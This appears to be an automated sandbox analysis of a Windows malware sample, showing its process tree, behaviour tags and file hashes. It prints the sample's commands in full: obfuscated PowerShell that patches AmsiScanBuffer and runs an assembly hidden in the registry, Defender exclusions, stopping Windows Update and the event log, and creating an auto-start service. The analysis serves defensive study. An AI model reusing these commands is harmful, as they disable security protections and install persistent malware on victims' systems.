C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
PID:680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:512
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1020
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1056
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1076
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1132 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:740
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:lUluJKRPutup{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$HTDJBgMDYublsP,[Parameter(Position=1)][Type]$SYFGcnAxYt)$coBmoPzITTW=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+'c'+'t'+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+'a'+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+''+'e'+''+[Char](109)+'o'+[Char](114)+''+[Char](121)+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('M'+'y'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+''+[Char](84)+''+'y'+'p'+'e'+'',''+[Char](67)+'l'+[Char](97)+''+[Char](115)+'s,'+'P'+''+'u'+'bl'+[Char](105)+''+[Char](99)+',S'+'e'+''+[Char](97)+''+'l'+'ed'+[Char](44)+'An'+[Char](115)+'i'+[Char](67)+'l'+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$coBmoPzITTW.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+'e'+''+[Char](99)+''+'i'+'a'+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+''+'i'+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+'ig'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$HTDJBgMDYublsP).SetImplementationFlags(''+[Char](82)+'unt'+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+'Ma'+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$coBmoPzITTW.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+'o'+[Char](107)+'e',''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+'ic,'+'H'+'i'+[Char](100)+'eB'+'y'+''+'S'+''+[Char](105)+''+[Char](103)+''+','+''+'N'+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+'o'+''+[Char](116)+''+[Char](44)+''+'V'+'i'+'r'+''+[Char](116)+'u'+[Char](97)+''+'l'+'',$SYFGcnAxYt,$HTDJBgMDYublsP).SetImplementationFlags(''+[Char](82)+'unt'+'i'+''+'m'+''+[Char](101)+''+[Char](44)+'M'+'a'+''+'n'+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $coBmoPzITTW.CreateType();}$kVIfhmgatTnin=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+[Char](116)+''+'e'+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+'l'+''+'l'+'')}).GetType('Mi'+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+'o'+[Char](102)+''+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+'2'+[Char](46)+''+[Char](85)+'nsa'+[Char](102)+''+'e'+'N'+'a'+''+[Char](116)+''+[Char](105)+'ve'+[Char](77)+''+[Char](101)+''+[Char](116)+'ho'+'d'+''+[Char](115)+'');$UJMsCvTDpjfKPs=$kVIfhmgatTnin.GetMethod(''+[Char](71)+''+'e'+''+'t'+'P'+[Char](114)+''+'o'+''+[Char](99)+''+[Char](65)+''+'d'+''+[Char](100)+''+'r'+''+[Char](101)+''+'s'+''+'s'+'',[Reflection.BindingFlags](''+'P'+''+'u'+'b'+[Char](108)+''+'i'+''+[Char](99)+','+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$IHGRoEbrlQFRDPhGPcI=lUluJKRPutup @([String])([IntPtr]);$GceUyCpEyHWZXqIapZssll=lUluJKRPutup @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$EPVNFNLDTmN=$kVIfhmgatTnin.GetMethod(''+'G'+''+[Char](101)+'t'+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+'a'+''+[Char](110)+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+'r'+'n'+''+[Char](101)+''+[Char](108)+''+'3'+''+[Char](50)+''+'.'+''+'d'+'l'+[Char](108)+'')));$cKSjHMORxluBcm=$UJMsCvTDpjfKPs.Invoke($Null,@([Object]$EPVNFNLDTmN,[Object](''+[Char](76)+''+'o'+''+'a'+''+[Char](100)+''+[Char](76)+''+'i'+''+'b'+'r'+'a'+'r'+'y'+''+'A'+'')));$uAujNAFIDcqLeQMLj=$UJMsCvTDpjfKPs.Invoke($Null,@([Object]$EPVNFNLDTmN,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+'l'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+'ec'+'t'+'')));$huimcqu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($cKSjHMORxluBcm,$IHGRoEbrlQFRDPhGPcI).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+'l');$UkfrmjbOsuItYEXIT=$UJMsCvTDpjfKPs.Invoke($Null,@([Object]$huimcqu,[Object](''+'A'+''+[Char](109)+''+[Char](115)+'iS'+'c'+'a'+[Char](110)+'B'+'u'+'f'+[Char](102)+'e'+[Char](114)+'')));$vCHVnWIyHc=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($uAujNAFIDcqLeQMLj,$GceUyCpEyHWZXqIapZssll).Invoke($UkfrmjbOsuItYEXIT,[uint32]8,4,[ref]$vCHVnWIyHc);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$UkfrmjbOsuItYEXIT,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($uAujNAFIDcqLeQMLj,$GceUyCpEyHWZXqIapZssll).Invoke($UkfrmjbOsuItYEXIT,[uint32]8,0x20,[ref]$vCHVnWIyHc);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+'FT'+[Char](87)+''+'A'+''+'R'+''+[Char](69)+'').GetValue('d'+[Char](105)+'a'+[Char](108)+''+'e'+''+'r'+'st'+'a'+''+[Char](103)+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2912
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:xRKUOElxnaMN{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$PryJvtdCdOEQEO,[Parameter(Position=1)][Type]$MbGPZfQRan)$cuIeGAGdJOr=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+'f'+[Char](108)+''+[Char](101)+''+'c'+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+'e'+'m'+[Char](111)+''+'r'+''+[Char](121)+''+[Char](77)+''+[Char](111)+'du'+'l'+'e',$False).DefineType('M'+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+'e'+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+'e','C'+[Char](108)+''+[Char](97)+''+'s'+'s'+','+'P'+'u'+'bli'+'c'+''+','+''+[Char](83)+''+'e'+'a'+'l'+''+[Char](101)+''+'d'+''+','+'A'+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+'la'+[Char](115)+''+'s'+''+[Char](44)+''+'A'+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$cuIeGAGdJOr.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+'id'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+''+'l'+''+'i'+'c',[Reflection.CallingConventions]::Standard,$PryJvtdCdOEQEO).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+','+'M'+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$cuIeGAGdJOr.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+'ubli'+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+'e'+'w'+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+'i'+[Char](114)+''+[Char](116)+'ua'+[Char](108)+'',$MbGPZfQRan,$PryJvtdCdOEQEO).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+'e'+','+[Char](77)+'a'+'n'+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');Write-Output $cuIeGAGdJOr.CreateType();}$ujEFDGfNQMehp=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+'s'+''+'t'+'em'+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType('M'+[Char](105)+''+[Char](99)+''+'r'+''+'o'+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+'.'+'W'+''+'i'+''+[Char](110)+'3'+[Char](50)+''+[Char](46)+''+[Char](85)+'n'+[Char](115)+''+[Char](97)+''+'f'+'e'+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+'eM'+'e'+'t'+[Char](104)+''+[Char](111)+''+'d'+'s');$HxdpXMNGzsLxlF=$ujEFDGfNQMehp.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+'P'+'r'+''+'o'+''+[Char](99)+'Ad'+'d'+'r'+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+'b'+''+'l'+''+'i'+''+'c'+''+[Char](44)+''+[Char](83)+''+'t'+''+[Char](97)+''+'t'+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$nqcRAKjGOYzQJXMvncj=xRKUOElxnaMN @([String])([IntPtr]);$NesHFdXHaCjiJPhctPXPeQ=xRKUOElxnaMN @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$CSaQVePZguD=$ujEFDGfNQMehp.GetMethod(''+'G'+''+[Char](101)+''+'t'+''+[Char](77)+''+'o'+'du'+[Char](108)+''+'e'+''+'H'+''+[Char](97)+''+[Char](110)+''+'d'+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+'n'+[Char](101)+''+[Char](108)+''+'3'+''+'2'+''+[Char](46)+''+'d'+'ll')));$hFcouRURqUkPyp=$HxdpXMNGzsLxlF.Invoke($Null,@([Object]$CSaQVePZguD,[Object]('L'+'o'+''+'a'+''+[Char](100)+''+[Char](76)+'i'+[Char](98)+'r'+[Char](97)+''+[Char](114)+''+[Char](121)+'A')));$dMplgJVcFkFdkyGje=$HxdpXMNGzsLxlF.Invoke($Null,@([Object]$CSaQVePZguD,[Object]('V'+[Char](105)+'r'+[Char](116)+'u'+'a'+''+'l'+''+[Char](80)+'r'+[Char](111)+''+[Char](116)+'ec'+[Char](116)+'')));$keJLWYK=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hFcouRURqUkPyp,$nqcRAKjGOYzQJXMvncj).Invoke(''+[Char](97)+''+[Char](109)+'s'+'i'+'.'+'d'+''+[Char](108)+''+'l'+'');$LBSvUIHHStlAFmcYD=$HxdpXMNGzsLxlF.Invoke($Null,@([Object]$keJLWYK,[Object]('A'+[Char](109)+'s'+[Char](105)+'S'+[Char](99)+''+[Char](97)+''+'n'+''+[Char](66)+''+[Char](117)+''+'f'+''+'f'+''+[Char](101)+''+'r'+'')));$FiGtZOxVGz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dMplgJVcFkFdkyGje,$NesHFdXHaCjiJPhctPXPeQ).Invoke($LBSvUIHHStlAFmcYD,[uint32]8,4,[ref]$FiGtZOxVGz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$LBSvUIHHStlAFmcYD,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dMplgJVcFkFdkyGje,$NesHFdXHaCjiJPhctPXPeQ).Invoke($LBSvUIHHStlAFmcYD,[uint32]8,0x20,[ref]$FiGtZOxVGz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue('d'+'i'+''+[Char](97)+'l'+[Char](101)+'r'+'s'+'ta'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:388 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1380
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1208
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1248
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1336
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1428
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1436
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1452
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2988
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1484
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1504
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1616
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1700
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1708
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1804
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1868
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1880
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1892
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1904
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1964
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1356
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2036
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2208
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2216
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2300
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2344
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2352
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2392
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2412
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2464
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2476
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2968
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2232
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3112
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3332
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3420
-
C:\Users\Admin\AppData\Local\Temp\50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe"C:\Users\Admin\AppData\Local\Temp\50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe"2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5056 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2940
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵
- Suspicious use of WriteProcessMemory
PID:1476 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵PID:4588
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc3⤵
- Launches sc.exe
PID:3900
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:4420
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv3⤵
- Launches sc.exe
PID:3068
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits3⤵
- Launches sc.exe
PID:2292
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc3⤵
- Launches sc.exe
PID:1068
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2360
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3076
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4228
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3940
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe3⤵PID:4068
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "HGLZSDMZ"3⤵
- Launches sc.exe
PID:4012
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "HGLZSDMZ" binpath= "C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe" start= "auto"3⤵
- Launches sc.exe
PID:4352
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:4048
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "HGLZSDMZ"3⤵
- Launches sc.exe
PID:2112 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3416
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:4940 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1052
-
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:1796
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3544
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3748
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3904
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3580
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:4444
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:2136
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:1376
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:4900
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2156
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:5028
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2252
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:516
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:2632
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:5116
-
C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeC:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:2020 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1280
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:3084 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:3388
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:4716
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:4612
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:2668
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:1960
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:1164
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4840
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3280
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4452
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1284
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:4492
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:4756
-
-
C:\Windows\system32\dialer.exedialer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3856
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
PID:2268
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.2MB
MD53cae1f11044d2ca787824610a40f1696
SHA1bf4af642f36e87b887f973f47a46bcb2e656c636
SHA25650ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251
SHA5120918a7876c39cf901e9a4128f456683d85d2564767600ce4536c9d0bcd4be1b380cad8fcdf6d0b96fd30e48a0f1e73e66df6d5f279fb31e5fe5ecca3e2f856a7
-
Filesize
60B
